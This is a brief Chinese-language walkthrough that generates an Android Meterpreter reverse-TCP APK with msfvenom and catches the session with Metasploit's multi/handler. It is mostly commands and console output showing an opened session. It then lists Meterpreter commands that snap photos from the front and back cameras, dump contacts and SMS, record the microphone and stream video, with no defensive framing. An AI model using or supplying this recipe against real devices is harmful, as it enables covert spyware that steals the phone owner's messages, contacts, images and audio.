1.生成apk程序
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 R > apk.apk
2.啟動msfconsole
3.啟動use exploit/multi/handler模塊
4.set payload android/meterpreter/reverse_tcp
5.show options
6.准備工作
msf exploit(handler) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit(運行apk程序)
[*] Started reverse TCP handler on 192.168.1.101:5555
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.101:5555 -> 192.168.1.105:57629) at 2017-06-27 22:25:09 +0800
7.查看手機信息sysinfo
8.查看攝像頭
meterpreter > webcam_list
1: Back Camera
2: Front Camera
9.啟動攝像頭拍照
webcam_snap -i 1
webcam_snap -i 2
dump_contacts --》這個是導出電話
dump_sms --》這個是導出信息
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
成功解決